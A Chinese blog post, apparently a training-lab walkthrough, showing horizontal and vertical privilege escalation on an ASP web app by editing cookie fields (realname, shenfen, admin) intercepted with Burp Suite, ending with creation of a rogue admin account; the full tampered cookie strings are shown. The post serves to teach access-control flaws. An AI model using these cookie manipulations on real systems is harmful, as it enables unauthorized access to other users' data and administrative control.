越权——漏洞操作记录<掌控安全>

最新推荐文章于 2023-12-26 10:49:46 发布
最新推荐文章于 2023-12-26 10:49:46 发布
阅读量242 收藏 2
点赞数
分类专栏: 漏洞/靶场操作记录 文章标签: html5 自动驾驶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/120517909
版权

越权漏洞越权分为两种:一种为水平越权,一种为垂直越权。

 水平越权:指同权限之间能相互修改或查看对方的资料(比如:同为用户 用户A可以查看用户B的资料)

垂直越权:指低权限用户能够修改或查看高权限用户的资料(比如:用户组A能够拥有管理组B的权限)

进入靶场

http://117.41.229.122:8002

 

此处提供注册(不能提供注册的利用信息收集)

先注册两个账号   用户1:twalone   用户2: twalone1

先进行两个号的水平越权

使用BurpSuite抓包 配置好BurpSuite 在此页面F5刷新后

查看twalone账号报修的信息

 

抓到的包

Cookie:ASPSESSIONIDCSAQBBDS=DKILLBFDFFNJINIDLNEOEOBD;ASPSESSIONIDCQCRAADS=EENPKOFDBFBFKAGNGBOODKNH;ASPSESSIONIDAQCSBDAS=GHPJLNGDAGOHEKPMOKFPLAIC;BWSsoft%5F2010=realname=twalone1&dlcs=3&username=twalone1&wxqy=&bumen=twalone1&loginname=twalone1&danwei=twalone1&shenfen=2&UserID=25&admin=0&wxlb=&phone=12345678998&CookieDate=

注意一下这里的cookie  我们可以修改realname=的值来达到水平越权

现在我登录的是twalone1 修改成twalone 放包查看

Cookie:ASPSESSIONIDCSAQBBDS=DKILLBFDFFNJINIDLNEOEOBD;ASPSESSIONIDCQCRAADS=EENPKOFDBFBFKAGNGBOODKNH;ASPSESSIONIDAQCSBDAS=GHPJLNGDAGOHEKPMOKFPLAIC;BWSsoft%5F2010=realname=twalone&dlcs=3&username=twalone1&wxqy=&bumen=twalone1&loginname=twalone1&danwei=twalone1&shenfen=2&UserID=25&admin=0&wxlb=&phone=12345678998&CookieDate=

 

这里twalone 的信息就能看到了   这里就达到了水平越权

既然能水平越权,而且刚刚抓到的包里面有admin的值尝试修改其值最后发现当shenfen=1能进入管理界面

点击后台管理提示不是管理    又继续尝试

当发现admin=1和shenfen=1时  这时服务器会认为当前账号为管理员账号 可以进入管理界面

ASPSESSIONIDCSAQBBDS=DKILLBFDFFNJINIDLNEOEOBD;ASPSESSIONIDCQCRAADS=EENPKOFDBFBFKAGNGBOODKNH;BWSsoft%5F2010=realname=twalone1&dlcs=3&username=twalone1&wxqy=&bumen=twalone1&loginname=twalone1&danwei=twalone1&shenfen=1&UserID=25&admin=1&wxlb=&phone=12345678998&CookieDate=;ASPSESSIONIDAQCSBDAS=LHPJLNGDOGEEBDHHIMLJDPBI

 

 

管理界面就出来了   这里是垂直越权

发现有用户组是不是就想干点啥,没错就是添加用户而且还是是管理员权限的。

 

通过改包成功添加twalone2管理员账号   登录twalone2 

 

越权漏洞到此结束    有不足的地方请各位大佬多多指教。

chick&
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
《信息安全工程师教程》——网络信息安全概述
sunr_的博客
09-08 3555
网络发展现状与重要性认识 计算机网络演变成人类活动的新空间,即网络空间,它是国家继陆、海、空、天后的第五个疆域。 网络信息安全相关概念 网络信息安全的发展历经了通信保密、计算机安全、信息保障、可信计算等阶段。 狭义的网安特指网络信息系统的各组成要素符合安全属性的要求,即机密性、完整性、可用性、抗抵赖性、可控性。 广义的网安涉及国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。 根据《中华人民共和国网络安全法》,网安是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使
【精选】小白是如何挖漏洞的(技巧篇)
hackzkaq的博客
07-29 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-山屿云 目录: 怎么找漏洞 找到后如何挖漏洞 关于通杀漏洞N day漏洞的挖掘 漏洞如何提交 每小结都有提供对应的案例,简直不要太nice! 这个月的SRC活动也快开始了,看到群里的小伙伴在问如何找漏洞,SQL注入的漏洞咋找,逻辑漏洞咋找,支付漏洞咋找,越权漏洞咋找,等等 其实这都一个道理,用谷歌语法,找通杀用fofa,这里演示几个类型的漏洞,其它的也是一个道理 第一个:SQL注入漏洞 AS:首先是SQL注入的,这个
靶场复现仅用于学习——支付漏洞
weixin_46601374的博客
03-28 9699
靶场复现,学习原理,维护安全,不准上升到现实!!!! 这就是个靶场,现在的网站那有这种漏洞。 快捷支付原理 商户网站接入支付结果有两种方式, 一种是通过浏览器进行跳转通知, 一种是服务器端异步通知 浏览器跳转 基于用户访问的浏览器,如果用户在银行页面支付成功后,直接关闭了页面,并未等待银行跳转到支付结果页面,那么商户网站就收不到支付结果的通知,导致支付结果难以处理。而且浏览器端数据很容易被篡改而降安全性 服务器端异步通知 该方式是支付公司服务器后台直接向用户指定的异步通知URL发送参.
支付漏洞简介及靶场演示
seek_2022的博客
06-09 3395
本文简单介绍了一下支付漏洞的原理、挖掘及常见的防御方法,并通过靶场的演示,介绍了支付漏洞的利用方法。
掌控安全Web安全微专业笔记
热门推荐
xcsxchen
10-26 1万+
1-3 Web通信原理 一、基本知识介绍 IP 正统定义:互联网协议地址,缩写为IP地址,是分配给用户上网使用的网际协议的设备的数字标签。 老师理解:ip实际上就是地址,如果我想到你家去玩,那么我肯定要知道你家住在哪里,ip实际上就是你电脑的地址,在网络上可以通过ip来访问你的计算机。 ip有内网和公网的概念。什么是内网?什么是公网? 打个比方: 你家的门牌号那就是个公网地址,X省X市X街道X号,别人看到这个地址就能找到你家 内网地址是什么妮,假设你住的是一个大楼,比如住401房间,那么只有同一个大楼里面的
网络安全服务与管理
weixin_46273733的博客
10-28 3002
等保发展历程 1994年国务院颁布《中华人民共和国计算机信息系统安全保护条例》 ——计算机信息系统实行安全等级保护,安全等级的划分标准和具体办法,由公安部分会同有关部门制定。 2003年 中办发《关于加强信息安全保障工作的意见》 ——要重点保护基础信息网络和关系国家安全、经济命脉、社会稳定等方面的重要信息系统,抓紧建立信息安全等级保护制度,制定信息安全等级保护的管理办法和技术指南。 2007年 公通字《信息安全等级保护管理办法》 ——明确了信息安全等级保护的具体要求,需要履行信息安全等级保护的义
网络安全技术
最新发布
A
12-26 2068
它们提供了新的工具和方法来处理和保护敏感信息,同时也带来了一些新的挑战,如量子错误纠正和量子噪声的控制。目前,量子技术仍处于快速发展和探索阶段,但已经引起了广泛的关注,并在学术界和工业界进行了大量的研究和实验。资源消耗攻击:攻击者利用目标系统的软件或协议漏洞,发送特定的请求或恶意代码,以消耗目标系统的处理能力、内存或存储资源,导致系统崩溃或无法响应合法用户的请求。(8)其他应用安全技术。攻击使用分布式网络中的多个计算机、服务器或物联网设备,同时向目标系统发送大量的请求或攻击流量,以超过目标系统的处理能力。
新品发布!聚铭网络正式推出聚铭数据库安全审计系统
cover_se的博客
03-26
随着信息化速发展,信息安全建设的中心正由网络防护向数据防护转移,对于承载着数据的容器——数据库,已然成为安全威胁的重点。作为核心数据的存储载体,数据库保管着大量的企业客户信息、财务信息甚至国家涉密信息,它的安全直接关系着企业的命脉,其遭受的各种攻击,直接会导致用户敏感数据泄露,间接可能导致用户的破产。 然而,在当前复杂的网络环境下,数据库在使用过程中往往缺乏必要技术防护手段,使得存储在数据库...
阜南携手亚信安全 共筑“智慧阜南”安全
xinyuan82的博客
10-09 1
客户需求:“智慧阜南”建设中信息安全不能缺席,信息安全要从规划伊始就重点谋划,从顶层设计入手,统筹应用安全、网络安全、数据安全、运营安全、移动安全在内的整体解决方案,确保阜南人民享受到放心、便捷的“智慧阜南”服务。 解决方案:亚信安全全面发挥智慧城市安全框架的顶层设计能力,在“智慧阜南”大数据平台、各智慧应用建设和数据融合过程中,制定了完整的数据分级、数据保护、数据使用权限安全策略,并通过标准...
网络安全之垂直越权漏洞讲解.mp4
11-13
越权漏洞一般包括平行越权和垂直越权。对平行越权漏洞防护中,增加访问操作对象的用户属性,在对目标对象进行访问操作时,服务端校验会话与对象的用户属性,在校验通过后才能执行读取和操作
7、越权漏洞.pdf资料
10-15
越权漏洞是网络安全领域中的一个重要话题,涉及到用户权限管理和系统安全。这种漏洞允许未经授权的用户访问操作他们本不应该能够触及的数据或功能,通常表现为水平越权和垂直越权。 水平越权漏洞主要发生在同一...
Web应用安全越权漏洞实验.docx
06-20
实验九:越权漏洞 一、实验目的 了解什么是越权漏洞 如何利用越权漏洞 二、实验内容 利用靶场环境进行越权漏洞演练,使得一个普通用户利用越权漏洞非法成为管理员用户。 实验环境 靶机 Win 10系统 Burpsuite 实验...
逻辑漏洞越权详解-漏洞银行大咖周6-浅安
01-26
越权漏洞是指在服务器端对客户端的数据请求操作中存在的一种逻辑错误,这种错误使得服务器对用户操作权限的判断出现了盲区,导致攻击者可以执行超出其权限操作。例如,普通用户可以访问到管理员级别的功能,或者一...
从应用场景看金融安全 —— 逻辑为王.pdf
01-07
在测试金融系统的安全性时,传统的方法是从漏洞类型出发,如XSS、SQL注入、水平/垂直越权等,虽然全面,但繁琐且容易遗漏功能点。而从应用场景出发的渗透测试则更注重逻辑性的测试,寻找特定场景下可能出现的漏洞。...
sql显错注入——靶场操作记录掌控安全
chick11的博客
09-28 2512
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
细心——漏洞实战
chick11的博客
10-08 1478
这不是刚起床嘛。那就活动活动筋骨把~~~ 这后台乍一看像是良精的程序。Admin admin弱口令进入之。 可是仔细看了一下。并没有良精后台传说中的页面,,连良精的通杀拿shell的配置页面/admin/SiteConfig.asp都消失的无影无踪。我估计这是良精的改版或者页面被管理员删除了。 看到一上传页面。抓包上传之。 可是不管是用神马类型的方式上传。显示的结果都是gif后缀。 这时候翻到文件上传管理,发现了文件管理中有asp的文件。访问之确实是我刚才上传的小马 .
漏洞操作记录—— X-Forwarded-For 注入漏洞实战
chick11的博客
07-07 860
墨者学院 X-Forwarded-For 注入漏洞实战——解题思路 打开漏洞靶场链接 随便输入账号密码点击登录 出现弹窗 弹窗显示IP地址 用burp抓一个包看看 流量包中发现X -forwarded-for: 缺失 把抓到的包发送到repeater中,在请求头中增加X-Forwarded-For: ' 发现报错 还可改为127.0.0.1' 尝试用字符看看能不能闭合 尝试闭合成功,很明显常见字符型注入 尝试爆数据库 库database..
密码找回漏洞—靶场操作掌控安全
chick11的博客
09-27 626
这题主要就是绕过验证码 来到靶场根据靶场提示访问:http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok 发现是一个重置密码的页面 我们把这题的源码下载下来进行审计 全局搜索里搜:密码找回 通过审计发现,$fsjs=rand(10,10000)随机生成认证码, 只有认证码一样就可以重置密码 我么通过抓包进行爆破 爆破成功 ...
Web安全揭秘:理解与防范横向越权漏洞
在"010-Web安全基础6 - 访问控制漏洞"的讲解中,主要探讨了Web应用中的一个重要安全问题——横向越权漏洞。这是一种逻辑漏洞,当程序在处理用户请求时,没有正确地执行访问控制机制,导致用户能够访问操作他们不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值